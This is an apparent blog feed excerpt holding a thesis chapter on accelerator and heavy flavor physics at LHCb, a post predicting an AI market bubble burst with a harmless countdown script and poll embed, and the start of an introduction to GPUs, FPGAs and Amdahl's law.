<h3 id="primary-and-secondary-vertices">Primary and Secondary Vertices</h3>

<p>Primary vertices are points in space where a particle collision occurred, resulting in the generation of other particles at this point, as shown in Fig. 5. The location of this point can be reconstructed from the tracks of particles emerging directly from the collision. Secondary (or displaced) vertices are points displaced from the primary vertex, where the decay of a long-lived particle occurred. These points can be reconstructed from the tracks of decay products that do not originate from the primary interaction.</p>

<p>Primary vertices are a crucial element of many physics analyses <a href="https://dx.doi.org/10.1088/1742-6596/119/3/032033">[Ref]</a>. The precise reconstruction of many processes, the identification of \(b\)- or \(\tau\)-jets, the reconstruction of exclusive
\(b\)-decays and the measurement of lifetimes of long-lived particles are all dependent upon the precise knowledge of the location of the primary vertex. Secondary vertices, on the other hand, are tools for identifying heavy flavor hadrons and \(\tau\) leptons <a href="https://dx.doi.org/10.1088/1742-6596/110/9/092009">[Ref]</a>.</p>

<p><img src="/assets/accelerator-heavy-flavor-physics/vertices.png" alt="vertices" /></p>

<p><strong>Figure 5:</strong> Illustration of Primary Vertices (PVs) and Secondary Vertices (SVs) in colliding-beam experiments. PVs are points in space where a primary particle collision occurred, and can be reconstructed from the tracks of particles emerging directly from the collision. SVs, on the other hand, are points displaced from the PV where the decay of a long-lived particle occurred. They can be reconstructed from the tracks of decay products that do not originate from the primary interaction. Adapted from <a href="https://tikz.net/jet_btag/">[Ref]</a>.</p>

<h3 id="luminosity">Luminosity</h3>

<p><em>Luminosity</em> \(L\) is defined as the number of events \(dN\) detected in a time interval \(dt\), divided by the interaction cross section \(\sigma\) <a href="https://cds.cern.ch/record/941318">[Ref]</a>:</p>

<p>\[
    L = \frac{1}{\sigma} \frac{dN}{dt} \,,
\]
and is often given units of \(\text{cm}^{-2} \cdot \text{s}^{-1}\). In practice, the luminosity depends on the parameters of the particle beam, such as the beam width and particle flow rate.</p>

<p><em>Integrated luminosity</em> \(L_{\text{int}}\) is defined as the integral of the luminosity with respect to time:</p>

<p>\[
    L_{\text{int}} = \int L \,dt = \frac{N}{\sigma} \,,
\]
where \(N\) is now the total number of collision events produced. \(L\) is frequently referred to as the instantaneous luminosity, to emphasize the distinction from its time-integrated counterpart \(L_{\text{int}}\). Integrated luminosity, having units of inverse cross section, is often measured in inverse femtobarns \(\text{fb}^{-1}\): it counts the number of collisions produced per femtobarn of cross section.</p>

<p>These variables are useful quantities to evaluate the performance of a particle accelerator. In particular, most HEP collision experiments aim to maximize their luminosity, since a higher luminosity means more collisions and consequently a higher integrated luminosity means a larger volume of data available to be analyzed.</p>
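<p>As a back-of-the-envelope illustration of these definitions (the numbers below are round, illustrative values, not measurements from this text):</p>

```python
# Unit conversions: 1 b = 1e-24 cm^2, so 1 fb = 1e-39 cm^2 and 1 fb^-1 = 1e39 cm^-2
FB_TO_CM2 = 1e-39

inst_lumi = 1e34          # instantaneous luminosity in cm^-2 s^-1 (LHC-design order of magnitude)
running_seconds = 1e7     # rough seconds of physics running in one year (illustrative)

l_int_cm2 = inst_lumi * running_seconds   # integrated luminosity in cm^-2
l_int_fb = l_int_cm2 * FB_TO_CM2          # the same, expressed in fb^-1
print(l_int_fb)                           # ~100 fb^-1

# N = L_int * sigma: events produced for an illustrative cross section of 50 pb = 5e4 fb
sigma_fb = 5e4
print(l_int_fb * sigma_fb)                # ~5 million events
```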

<p>For colliding-beam experiments, where two beams of particles are accelerated in opposite directions and brought into collision, as is the case most of the time at the LHC, the instantaneous luminosity can be calculated as <a href="https://cds.cern.ch/record/941318">[Ref]</a>:</p>

<p>\[
    L = \frac{N^2 f N_b}{4 \pi \sigma_x \sigma_y} \,,
\]
where \(N\) denotes the number of particles per bunch, \(f\) is the revolution frequency, and \(N_b\) is the number of bunches in each beam. The transverse dimensions of the beam, assuming a Gaussian profile, are described by \(\sigma_x\) and \(\sigma_y\).</p>
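<p>Plugging in numbers close to the nominal LHC design parameters (the values below are commonly quoted design figures, used here purely as an illustration) reproduces the familiar design luminosity of order \(10^{34}\ \text{cm}^{-2}\text{s}^{-1}\):</p>

```python
import math

n_per_bunch = 1.15e11        # protons per bunch (nominal LHC design value)
f_rev = 11245.0              # revolution frequency in Hz
n_bunches = 2808             # bunches per beam
sigma_x = sigma_y = 16.7e-4  # transverse beam size at the interaction point, in cm (16.7 um)

# L = N^2 f N_b / (4 pi sigma_x sigma_y), assuming head-on Gaussian beams
lumi = n_per_bunch**2 * f_rev * n_bunches / (4 * math.pi * sigma_x * sigma_y)
print(f"{lumi:.2e} cm^-2 s^-1")   # ~1.2e34, the LHC design luminosity scale
```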

<h3 id="impact-parameter">Impact Parameter</h3>

<p>The impact parameter \(b\) represents the shortest, perpendicular distance between the trajectory of a projectile and the center of the potential field generated by the target particle, as shown in Fig. 6. In accelerator experiments, collisions can be classified based on the value of the impact parameter. Central collisions have \(b \approx 0\), while peripheral collisions have impact parameters comparable to the radii of the colliding nuclei.</p>

<p><img src="/assets/accelerator-heavy-flavor-physics/impact.png" alt="impact" /></p>

<p><strong>Figure 6:</strong> A projectile scattering off a target particle. The impact parameter \(b\) and the scattering angle \(\theta\) are shown. Figure from <a href="https://commons.wikimedia.org/wiki/File:Impctprmtr.png">[Ref]</a>.</p>

<h3 id="detector-acceptance">Detector Acceptance</h3>

<p>In particle collider experiments, the location of the collisions is predetermined. The directions of the produced particles, however, are not: the products can fly in every possible direction. Depending on the geometry of the experiment and its physics program, detecting all the products is not feasible, or even desirable. The region of the detector where the particles are in fact detectable is referred to as the <em>acceptance</em>. In some cases, detection also depends on the energy or other characteristics of the particle, in which case the acceptance is a function not only of the particle’s direction but also of those extra characteristics.</p>

<h2 id="the-standard-model-of-particle-physics">The Standard Model of Particle Physics</h2>

<p>The SM is a relativistic quantum field theory classifying all known elementary particles and describing three out of the four fundamental forces: the electromagnetic, weak nuclear and strong nuclear interactions, excluding gravity. It was developed progressively during the latter half of the 20th century through the contributions of numerous scientists worldwide <a href="https://books.google.com.na/books?id=5cyNEAAAQBAJ&amp;source=gbs_book_other_versions_r&amp;cad=1">[Ref]</a>. Its current form was established in the mid-1970s following the experimental confirmation of quarks. Subsequent discoveries, including the top quark in 1995 <a href="https://link.aps.org/doi/10.1103/PhysRevLett.74.2626">[Ref]</a>, the tau neutrino in 2000 <a href="https://www.sciencedirect.com/science/article/pii/S0370269301003070">[Ref]</a>, and the Higgs boson in 2012 <a href="https://www.sciencedirect.com/science/article/pii/S037026931200857X">[Ref]</a>, have further reinforced the validity of the Standard Model.</p>

<p>Fig. 7 depicts the elementary particles of the SM and their interactions. They can be divided into twelve <em>fermions</em> with spin-\(1/2\), five spin-1 gauge <em>bosons</em> (\(\gamma, g^a, W^{\pm}, Z^0\)), carriers of the electromagnetic, weak and strong interactions, and the spin-0 (scalar) Higgs boson (\(H\)).</p>

<p>The fermions are further grouped into six <em>quarks</em> and six <em>leptons</em>. The main difference is that quarks interact with all three fundamental forces of the SM, while leptons only interact with the weak and electromagnetic interactions. Quarks appear in six different flavors. In increasing order of quark masses they are called: up (\(u\)), down (\(d\)), strange (\(s\)), charm (\(c\)), bottom or beauty (\(b\)) and top (\(t\)) quarks. The quarks are further grouped into three generations of increasing masses. Up-type quarks (\(u\), \(c\), \(t\)) have an electric charge \(q=+(2/3)e\) while down-type quarks (\(d\), \(s\), \(b\)) have \(q=-(1/3)e\), where \(e\) is the elementary charge.</p>

<p>Quarks possess a property known as color charge, which causes them to interact through the strong force. Due to color confinement, quarks are tightly bound together, forming color-neutral composite particles called <em>hadrons</em>. As a result, quarks cannot exist in isolation and must always combine with other quarks. Hadrons are classified into two types: <em>mesons</em>, which consist of a quark-antiquark pair, such as the pion (\(\pi\)), the kaon (\(K\)), the \(B\), \(D\) and \(J/\psi\) mesons, and <em>baryons</em>, which are made up of three quarks. The lightest baryons are the nucleons: the proton and the neutron.</p>

<p>Furthermore, the solutions of the Dirac equation <a href="https://royalsocietypublishing.org/doi/10.1098/rspa.1928.0023">[Ref]</a> predict that each of the twelve SM fermions has a corresponding counterpart, known as its antiparticle, which possesses the same mass but opposite charge.</p>

<p>Similarly, the leptons are also grouped into three generations. Each generation contains a charged lepton and its corresponding uncharged neutrino. The charged leptons are the electron (\(e^-\)), the muon (\(\mu^-\)) and the tau (\(\tau^-\)). Their uncharged partners are the electron, muon and tau neutrinos (\(\nu_e\), \(\nu_{\mu}\), \(\nu_{\tau}\)). Being chargeless, they are not sensitive to the electromagnetic interaction and moreover, they are considered massless in the SM. The observation of neutrino oscillations <a href="https://link.aps.org/doi/10.1103/PhysRevLett.81.1562">[Ref]</a> requires that neutrinos have small but non-zero masses and thus implies physics beyond the SM.</p>

<p><img src="/assets/accelerator-heavy-flavor-physics/sm.png" alt="sm" /></p>

<p><strong>Figure 7:</strong> The Standard Model of elementary particles including twelve fundamental fermions and five fundamental bosons. Brown loops indicate the interactions between the bosons (red) and the fermions (purple and green). Please note that the masses of some particles are periodically reviewed and updated by the scientific community. The values shown in this graphic are taken from <a href="https://link.aps.org/doi/10.1103/PhysRevD.110.030001">[Ref]</a>. Figure from <a href="https://commons.wikimedia.org/wiki/File:Standard_Model_of_Elementary_Particles.svg">[Ref]</a>.</p>

<p>The five types of gauge bosons mediate the interactions between the fermions. The electromagnetic interaction is mediated by the photon \(\gamma\), the strong by eight distinct gluons \(g^a\), and the weak by the W\(^{\pm}\) and Z\(^0\) bosons. The Higgs boson plays a special role in the Standard Model by providing an explanation for why elementary particles, except for the photon and gluon, have mass. Specifically, the Higgs mechanism is responsible for the generation of the gauge boson masses while the fermion masses result from Yukawa-type interactions with the Higgs field.</p>

<p>Table 1 summarizes the masses \(m\) and electric charges \(q\) of the fermionic elementary particles of the SM, while in Table 2, the masses, charges and spins of the elementary bosons are shown.</p>

<table>
  <thead>
    <tr>
      <th>Generation</th>
      <th>Quark</th>
      <th>\(m\) (MeV/\(c^2\))</th>
      <th>\(q\) (\(e\))</th>
      <th>Lepton</th>
      <th>\(m\) (MeV/\(c^2\))</th>
      <th>\(q\) (\(e\))</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>1</td>
      <td>\(u\)</td>
      <td>\(2.16 \pm 0.07\)</td>
      <td>+2/3</td>
      <td>\(\nu_e\)</td>
      <td>\(&lt;2 \times 10^{-6}\)</td>
      <td>0</td>
    </tr>
    <tr>
      <td> </td>
      <td>\(d\)</td>
      <td>\(4.70 \pm 0.07\)</td>
      <td>-1/3</td>
      <td>\(e^-\)</td>
      <td>0.511</td>
      <td>-1</td>
    </tr>
    <tr>
      <td>2</td>
      <td>\(c\)</td>
      <td>\(1273.0 \pm 4.6\)</td>
      <td>+2/3</td>
      <td>\(\nu_{\mu}\)</td>
      <td>\(&lt;0.19\)</td>
      <td>0</td>
    </tr>
    <tr>
      <td> </td>
      <td>\(s\)</td>
      <td>\(93.5 \pm 0.8\)</td>
      <td>-1/3</td>
      <td>\(\mu^-\)</td>
      <td>105.66</td>
      <td>-1</td>
    </tr>
    <tr>
      <td>3</td>
      <td>\(t\)</td>
      <td>\(172\,570\pm 290\)</td>
      <td>+2/3</td>
      <td>\(\nu_{\tau}\)</td>
      <td>\(&lt;18.2\)</td>
      <td>0</td>
    </tr>
    <tr>
      <td> </td>
      <td>\(b\)</td>
      <td>\(4183 \pm 7\)</td>
      <td>-1/3</td>
      <td>\(\tau^-\)</td>
      <td>1777</td>
      <td>-1</td>
    </tr>
  </tbody>
</table>

<p><strong>Table 1:</strong> Summary of the masses and charges of the elementary fermions in the SM. Mass values taken from <a href="https://link.aps.org/doi/10.1103/PhysRevD.110.030001">[Ref]</a>. Uncertainties are not displayed for masses if they are smaller than the last digit of the value.</p>

<table>
  <thead>
    <tr>
      <th>Boson</th>
      <th>Type</th>
      <th>Spin</th>
      <th>\(m\) (GeV/\(c^{2}\))</th>
      <th>\(q\) (\(e\))</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Photon</td>
      <td>Gauge</td>
      <td>1</td>
      <td>0</td>
      <td>0</td>
    </tr>
    <tr>
      <td>Gluon</td>
      <td>Gauge</td>
      <td>1</td>
      <td>0</td>
      <td>0</td>
    </tr>
    <tr>
      <td>Z\(^0\)</td>
      <td>Gauge</td>
      <td>1</td>
      <td>\(91.1880 \pm 0.0020\)</td>
      <td>0</td>
    </tr>
    <tr>
      <td>W\(^{\pm}\)</td>
      <td>Gauge</td>
      <td>1</td>
      <td>\(80.3692 \pm 0.0133\)</td>
      <td>\(\pm 1\)</td>
    </tr>
    <tr>
      <td>Higgs</td>
      <td>Scalar</td>
      <td>0</td>
      <td>\(125.20 \pm 0.11\)</td>
      <td>0</td>
    </tr>
  </tbody>
</table>

<p><strong>Table 2:</strong> Summary of the masses, charges and spins of the elementary bosons of the SM. Mass values taken from <a href="https://link.aps.org/doi/10.1103/PhysRevD.110.030001">[Ref]</a>. The masses of the photon and the gluon are the theoretical values.</p>

<h2 id="open-questions">Open Questions</h2>

<p>Despite the successes of the Standard Model, it is not a complete theory of fundamental interactions, and several questions in physics remain open <a href="https://books.google.gr/books/about/Particle_Physics.html?id=bgeHngEACAAJ&amp;redir_esc=y">[Ref]</a>. For example, even though three of the four fundamental forces have been combined into the same theory, gravity, described by the general theory of relativity, cannot be integrated into the SM. The problem remains elusive, and theories Beyond the Standard Model (BSM), such as string theory or quantum gravity, are needed. In addition, why there is more matter than antimatter in the universe remains unexplained. This problem is known as the matter-antimatter asymmetry and is a core question in the LHCb physics program. It is closely related to CP violation, the violation of the combined charge-conjugation and parity symmetry in particle interactions, which is one of the reasons why CP violation is heavily studied at LHCb. Moreover, the SM does not account for the accelerating expansion of the universe, possibly driven by dark energy. Finally, the origin of dark matter remains to be understood, as do neutrino oscillations and the non-zero neutrino masses they imply.</p>

<h2 id="heavy-flavor-physics">Heavy Flavor Physics</h2>

<p>Going into more detail, the gigantic datasets being collected by the various accelerator experiments—and specifically by the Large Hadron Collider beauty (LHCb) experiment—are crucial to shed light on many of the open questions in particle physics <a href="http://arxiv.org/abs/2503.24346">[Ref]</a>, and in particular in heavy flavor physics.</p>

<p>An important matrix in flavor physics is the so-called Cabibbo–Kobayashi–Maskawa (CKM) matrix <a href="https://link.aps.org/doi/10.1103/PhysRevLett.10.531">[Ref]</a>, which has the form:</p>

<p>\[
V_{CKM} =
\begin{pmatrix}
V_{ud} &amp; V_{us} &amp; V_{ub} \\
V_{cd} &amp; V_{cs} &amp; V_{cb} \\
V_{td} &amp; V_{ts} &amp; V_{tb}
\end{pmatrix} \,.
\]</p>

<p>It is a unitary matrix that dictates the quark mixing strengths of the flavor-changing weak interaction, and is crucial in understanding CP violation. The unitarity of the CKM matrix imposes constraints on its elements, which can be visualized geometrically through the construction of so-called unitarity triangles. Unitarity triangles have angles conventionally labeled as \(\alpha\), \(\beta\) and \(\gamma\). The angle \(\beta\) is measured from the mixing-induced CP violation in \(B^0 \to J/\psi K^0_S\) decays. The angle \(\alpha\) is determined using the \(B\to \pi \pi\), \(\pi \rho\) and \(\rho \rho\) decays, while \(\gamma\) is inferred from CP violation effects in \(B^+ \to D K^+\) <a href="http://arxiv.org/abs/2503.24346">[Ref]</a>. The angles above arise from the unitarity relation between the columns of the CKM matrix describing the couplings of the up-type quarks to the \(d\) and \(b\) quarks. The current uncertainties, measured by LHCb, are \(0.57^{\circ}\) <a href="https://cds.cern.ch/record/2871717">[Ref]</a> and \(2.8^{\circ}\) <a href="https://cds.cern.ch/record/2905625">[Ref]</a> for \(\beta\) and \(\gamma\), respectively. These sensitivities have been achieved using data samples of integrated luminosity 2–9 fb\(^{-1}\). These values are projected to be reduced to \(0.20^{\circ}\) and \(0.8^{\circ}\), respectively, with 50 fb\(^{-1}\) of data recorded by the early 2030s, and even to \(0.08^\circ\) and \(0.3^\circ\), respectively, with 300 fb\(^{-1}\) of data recorded by the early 2040s.</p>
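<p>The unitarity constraint itself is easy to check numerically. The sketch below uses the leading-order Wolfenstein parametrization of the CKM matrix with rounded, illustrative parameter values (\(\lambda \approx 0.225\), \(A \approx 0.82\), \(\bar{\rho} \approx 0.14\), \(\bar{\eta} \approx 0.35\)); at this order, \(V V^{\dagger}\) equals the identity up to corrections of order \(\lambda^4\):</p>

```python
lam, A, rho, eta = 0.225, 0.82, 0.14, 0.35  # illustrative Wolfenstein parameters, not a fit result

# Leading-order Wolfenstein parametrization of the CKM matrix
V = [
    [1 - lam**2 / 2,                    lam,             A * lam**3 * (rho - 1j * eta)],
    [-lam,                              1 - lam**2 / 2,  A * lam**2],
    [A * lam**3 * (1 - rho - 1j * eta), -A * lam**2,     1],
]

# Largest deviation of V V^dagger from the 3x3 identity matrix
deviation = max(
    abs(sum(V[i][k] * V[j][k].conjugate() for k in range(3)) - (1 if i == j else 0))
    for i in range(3)
    for j in range(3)
)
print(deviation)  # small, of order lambda^4 ~ 1e-3
```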

<p>Improving our understanding of the CKM matrix through global fits requires more precise knowledge of the magnitudes of the \(\lvert V_{ub} \rvert\) and \(\lvert V_{cb} \rvert\) CKM matrix elements. We can determine these magnitudes by studying semileptonic decays like \(b \to u l \nu\) and \(b \to c l \nu\), where \(l\) denotes a charged lepton. Semileptonic decays can also be used to test the SM prediction of lepton flavor universality, namely that the charged-current weak interaction couples identically to the different lepton flavors. This can be done using observables such as \(R(D^{(* )})\), which are the branching fraction ratios</p>

<p>\[
    R(D^{(* )}) = \frac{\mathcal{B}(B \to D^{(* )} \tau \nu)}{\mathcal{B}(B \to D^{(* )} e \nu)}
\]
or
\[
    R(D^{(* )}) = \frac{\mathcal{B}(B \to D^{(* )} \tau \nu)}{\mathcal{B}(B \to D^{(* )} \mu \nu)} \,.
\]
The current values of these quantities suggest possible discrepancies with the SM. In order to further explore these discrepancies, the measured uncertainties on these values have to be reduced. Currently, the uncertainty on both \(|V_{ub}|\) <a href="https://www.nature.com/articles/nphys3415">[Ref]</a> and \(R(D^{(* )})\) <a href="https://cds.cern.ch/record/2857546">[Ref]</a> is at 6%, from LHCb measurements. These uncertainties are projected to be reduced down to 1% and 3%, for \(|V_{ub}|\) and \(R(D^{(* )})\), respectively, with the increased number of collisions expected until the early 2040s.</p>

<p>Moreover, even though all CP violation in the charm sector is suppressed in the SM, CP violation in \(D^0\)-meson decays has been observed through asymmetries in \(D^0 \to K^+ K^-\) and \(D^0 \to \pi^+ \pi^-\) decays, captured by the observable \(\Delta A_{CP} = A_{CP}\left(D^0 \to K^+ K^- \right) - A_{CP}\left(D^0 \to \pi^+ \pi^- \right)\). \(A_{CP}(D^0 \to f)\) denotes the asymmetry between the \(D^0 \to f\) and \(\bar{D}^0 \to f\) decay rates to a final state  \(f\). With a sample of 5.9 fb\(^{-1}\), LHCb quoted an uncertainty of \(29 \times 10^{-5}\) <a href="https://cds.cern.ch/record/2668357">[Ref]</a>. This uncertainty can be potentially reduced almost by a factor of 10, down to \(3.3 \times 10^{-5}\), given the expected integrated luminosities of 300 fb\(^{-1}\). Furthermore, the charm samples essential to these measurements are produced at very large signal rates. Without real-time processing at the full collision rate these samples would be impossible to collect.</p>

<p>Beyond CP violation, the study of lepton flavor violation offers another compelling avenue for discovering BSM physics. While lepton flavor violation occurs in neutrino oscillations, any related effect in charged leptons is unobservably small within the SM framework. Consequently, observing any non-zero effect would be an unambiguous sign of BSM physics. Similarly, stringent upper limits on branching fractions, like \(\mathcal{B}(\tau^+ \to \mu^+ \gamma)\) and \(\mathcal{B}(\tau^+ \to \mu^+ \mu^+ \mu^-)\), tightly constrain potential extensions of the Standard Model. For example, with a data sample of 424 fb\(^{-1}\), the Belle II collaboration has constrained \(\mathcal{B}(\tau^+ \to \mu^+ \mu^+ \mu^-)\) down to \(&lt;1.8 \times 10^{-8}\) <a href="https://doi.org/10.1007/JHEP09(2024)062">[Ref]</a>. With 50 ab\(^{-1}\) of data instead, this limit is projected to be tightened to \(&lt;0.02 \times 10^{-8}\) by the early 2040s.</p>

<p>Heavy flavor physics remains a vital part of the global particle physics program. While experiments including ATLAS, CMS, LHCb and Belle II offer complementary strengths, they will also compete for the best precision on certain observables. This competition will allow for crucial consistency checks and ultimately lead to even more precise world-average combinations. Collectively, these experiments can significantly advance the experimental precision of all the key observables in \(b\), \(c\) and \(\tau\) physics, with an expected improvement of typically one order of magnitude over what is available today. Nonetheless, this represents only a partial evaluation of the true physics reach, suggesting the impact will probably be even more significant. The precision currently within reach of these experiments, including their upgrades, provides an unprecedented capability to probe the flavor sector of the Standard Model.</p>

<h2 id="conclusion">Conclusion</h2>

<p>In this post, I started by introducing fundamental concepts in accelerator physics, necessary to understand the technical aspects related to the detector physics of this work. I also described the Standard Model of particle physics, the open questions in the field, and finally the research outlook and expected impact of heavy flavor physics research.</p>

<p>This article is one of the chapters of my PhD thesis titled: <strong>“Real-Time Analysis of Unstructured Data with Machine Learning on Heterogeneous Architectures”</strong>. The full text can be found here: <a href="/news/phd-thesis/">PhD Thesis</a>. In the main results part of this work, GNNs were used to perform the task of track reconstruction, in the context of the Large Hadron Collider (LHC) at CERN.</p>]]></content><author><name> </name></author><category term="Blog" /><category term="Accelerator Physics" /><category term="Particle Physics" /><category term="LHCb" /><category term="CERN" /><summary type="html"><![CDATA[Explore the fundamentals of accelerator physics and heavy flavor particle physics, including the Standard Model, CKM matrix, CP violation, from the perspective of the LHCb experiment at CERN.]]></summary></entry><entry><title type="html">AI Bubble Burst: Countdown and Poll</title><link href="https://fotisgiasemis.com/blog/ai-bubble-burst-countdown/" rel="alternate" type="text/html" title="AI Bubble Burst: Countdown and Poll" /><published>2025-09-28T00:00:00+02:00</published><updated>2025-09-28T00:00:00+02:00</updated><id>https://fotisgiasemis.com/blog/ai-bubble-burst-countdown</id><content type="html" xml:base="https://fotisgiasemis.com/blog/ai-bubble-burst-countdown/"><![CDATA[<!-- ------------------- Countdown Section ------------------- -->
<div id="burst-date" style="font-size:1.3em; margin-top:1rem; text-align:center;"></div>

<div id="countdown-container" style="text-align:center; margin-top:1rem;">
  <div id="countdown" style="font-size:2.5em; font-weight:bold; color:#00bcd4;
              text-shadow: 0 0 10px rgba(0,188,212,0.8),
                           0 0 20px rgba(0,188,212,0.6),
                           0 0 30px rgba(0,188,212,0.4);">
  </div>
  <div style="margin-top:0.5rem; font-size:1.2em;">
    Counting down to the burst ... 🫧💥
  </div>
</div>

<script>
// ------------------- Countdown -------------------
var burstDateObj = new Date(2027, 1, 8, 0, 0, 0); // JavaScript months are 0-indexed: 1 = February, i.e., 8 February 2027
var burstDate = burstDateObj.getTime();

document.getElementById("burst-date").innerHTML =
  "📅 My prediction: <strong>" + burstDateObj.toDateString() + "</strong>";

var x = setInterval(function() {
  var now = new Date().getTime();
  var distance = burstDate - now;

  var days = Math.floor(distance / (1000 * 60 * 60 * 24));
  var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
  var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
  var seconds = Math.floor((distance % (1000 * 60)) / 1000);

  if (distance < 0) {
    clearInterval(x);
    document.getElementById("countdown").innerHTML = "💥 It burst!";
  } else {
    document.getElementById("countdown").innerHTML =
      days + "d : " + hours + "h : " + minutes + "m : " + seconds + "s";
  }
}, 1000);
</script>

<h2 id="is-there-really-an-ai-bubble">Is There Really an AI Bubble?</h2>

<p><img src="/assets/images/ai-bubble.png" alt="ai-bubble" />
<em>Image generated using OpenAI’s DALL·E, September 2025.</em></p>

<p>First of all, is there really an <strong>AI bubble</strong>? Saying that there is an AI bubble does not mean that the AI boom is completely unjustified. The benefits of generative AI and LLMs are undeniable at this point, but the degree to which this new technology is going to increase productivity in any sector is <strong>very likely overestimated</strong>. This makes the market overvalued, and this is exactly what makes it a bubble. Even <strong>Sam Altman</strong>, one of the leaders behind the investment momentum and business deals responsible for this market sentiment, acknowledged the existence of a bubble in <a href="https://www.bloomberg.com/news/newsletters/2025-08-21/openai-s-altman-raises-stakes-for-ai-bubble-with-spending-push">late August</a>. For a more in-depth look at the circular deals between OpenAI, Nvidia and Oracle that sound the alarm of an imminent bubble, see the article here: <a href="https://www.telegraph.co.uk/business/2025/09/24/100bn-deal-signals-ai-bubble-burst/">The $100bn deal sparking fears of a dotcom-style crash</a>.</p>

<h2 id="how-market-bubbles-form">How Market Bubbles Form</h2>

<p>So, how exactly are bubbles formed? Essentially, a <strong>technological advance</strong> stimulates investment in a market, but the investment usually overshoots: the impact of the technology is overestimated at the beginning, and far more investment turns out to be needed before the technology is integrated and delivers a useful <strong>increase of productivity</strong>. When this is realised, the money is retracted and the bubble bursts. Later, a plateau is reached that matches the actual added value of the technology. You can see this in the figure below.</p>

<p><img src="/assets/images/bubble_stages.png" alt="bubble_stages" />
<strong>Figure:</strong> The stages of a market bubble. <a href="https://transportgeography.org/contents/chapter3/transportation-and-economic-development/bubble-stages/">Source</a>: Dr. Jean-Paul Rodrigue, Hofstra University.</p>

<h2 id="which-ai-companies-might-survive">Which AI Companies Might Survive?</h2>

<p>How to easily spot companies that will not survive the AI bubble burst? Look at what their selling point is. If their main selling point is simply to use the “intelligence” of AI, then this is a warning sign. If you remove the AI selling part, does the company reduce to nothing? Then it is very likely that <strong>the company is not going to make it past the AI boom and bust</strong>.</p>

<h2 id="community-poll-your-prediction">Community Poll: Your Prediction</h2>

<p>Now it’s your turn: When do you think the AI bubble will burst? Cast your vote below.</p>

<!-- ------------------- StrawPoll Section ------------------- -->
<div id="poll-container" style="margin-top:3rem; text-align:center;">
  <!-- <h3>📊 When do you think the AI bubble will burst?</h3> -->

  <div class="strawpoll-embed" id="strawpoll_6QnMQo2KPne" style="height: 772px; max-width: 640px; width: 100%; margin: 0 auto; display: flex; flex-direction: column;">
    <iframe title="StrawPoll Embed" id="strawpoll_iframe_6QnMQo2KPne" src="https://strawpoll.com/embed/6QnMQo2KPne" style="position: static; visibility: visible; display: block; width: 100%; flex-grow: 1;" frameborder="0" allowfullscreen="" allowtransparency="">Loading...</iframe>
    <script async="" src="https://cdn.strawpoll.com/dist/widgets.js" charset="utf-8"></script>
  </div>
</div>

<style>
#bubble-container {
  position: fixed; /* floats over everything */
  bottom: 0;
  left: 0;
  width: 100%;
  height: 100%;
  pointer-events: none; /* doesn’t block clicks */
  overflow: hidden;
  z-index: 9999;
}

@keyframes bubbleFloat {
  0%   { transform: translateY(0) scale(1); opacity: 1; }
  50%  { opacity: 0.7; }
  100% { transform: translateY(-120vh) scale(1.5); opacity: 0; }
}

.bubble {
  position: absolute;
  bottom: 0;
  font-size: 1.5em;
  animation: bubbleFloat linear forwards;
}
</style>

<div id="bubble-container"></div>

<script>
function createBubble() {
  const bubble = document.createElement("div");
  bubble.className = "bubble";
  bubble.innerHTML = "🫧";
  bubble.style.left = Math.random() * window.innerWidth + "px";
  bubble.style.animationDuration = (4 + Math.random() * 6) + "s";
  document.getElementById("bubble-container").appendChild(bubble);

  setTimeout(() => bubble.remove(), 10000);
}

setInterval(createBubble, 1200);
</script>

<blockquote>
  <p><strong>Disclaimer:</strong> The views expressed in this post are solely my own, based on publicly available information. They do not represent the views of any current or past employer. This content is not financial advice.</p>
</blockquote>]]></content><author><name> </name></author><category term="Blog" /><category term="Financial Markets" /><category term="Machine Learning" /><category term="Artificial Intelligence" /><summary type="html"><![CDATA[Is the AI boom sustainable, or are we heading toward an AI bubble burst? Explore the signs, timeline prediction, and community poll.]]></summary></entry><entry><title type="html">From GPUs to FPGAs – An Introduction to High-Performance Computing</title><link href="https://fotisgiasemis.com/blog/hpc-gpu-fpga-intro/" rel="alternate" type="text/html" title="From GPUs to FPGAs – An Introduction to High-Performance Computing" /><published>2025-09-11T00:00:00+02:00</published><updated>2025-09-11T00:00:00+02:00</updated><id>https://fotisgiasemis.com/blog/hpc-gpu-fpga-intro</id><content type="html" xml:base="https://fotisgiasemis.com/blog/hpc-gpu-fpga-intro/"><![CDATA[<h2 id="introduction">Introduction</h2>

<p>In this post, we look into parallel, as opposed to sequential, computation; specialized hardware, in particular <strong>Graphics Processing Units (GPUs)</strong> and <strong>Field-Programmable Gate Arrays (FPGAs)</strong>; and High Performance Computing (HPC). This background is essential for deploying ML models in <strong>high-throughput</strong> or <strong>resource-constrained</strong> contexts.</p>

<h2 id="parallelism">Parallelism</h2>

<p>Traditionally, computer software has been sequential. A computer program was constructed as a series of instructions to be executed one after the other on the Central Processing Unit (CPU) of the computer. Parallel computing <a href="https://doi.org/10.1017/9781316795835.011">[Ref]</a>, on the other hand, uses multiple processing elements in order to tackle a problem simultaneously. Many tasks are essentially a repetition of the same calculation a large number of times. So, if these calculations are independent from each other, why wait for each one to finish before proceeding to the next one? The execution can be performed in parallel and thus the routine can be sped up. Historically, parallel computing was used for scientific problems and simulations, such as meteorology. This led to the design of parallel hardware architectures and the development of software needed to program these architectures, as well as HPC <a href="https://link.springer.com/book/10.1007/978-3-031-28924-8">[Ref]</a>.</p>

<h3 id="amdahls-law">Amdahl’s Law</h3>

<p>Ideally, doubling the number of processors would halve the runtime. In practice, however, very few algorithms achieve this optimal speedup. The maximum potential speedup is given by Amdahl’s law <a href="https://doi.org/10.1145/1465482.1465560">[Ref]</a>. A task executed on a multicore system can be split into two parts: one that does not benefit from the use of multiple cores, and one that does. Assuming that the latter is a fraction \(\tau\) of the task, and that it is accelerated by a factor \(s\) compared to single-core execution, the maximum speedup is given by:</p>

<p>\[
    \text{Speedup}(s) = \frac{1}{1 - \tau + \frac{\tau}{s}} \,.
\]</p>

<p>The relationship is illustrated in Fig. 1. Interestingly, this law reveals that increasing the number of processors yields diminishing returns past a certain point. It also demonstrates that code optimization has to target both the parallelizable and the non-parallelizable components. Of course, the simplistic view of computation used in the derivation of Amdahl’s law neglects inter-process communication, synchronization and memory-access overheads. A more complete assessment is given by Gustafson’s law <a href="https://doi.org/10.1145/42411.42415">[Ref]</a>.</p>

<p><img src="/assets/hpc-gpu-fpga-intro/amdahl.png" alt="amdahl" /></p>

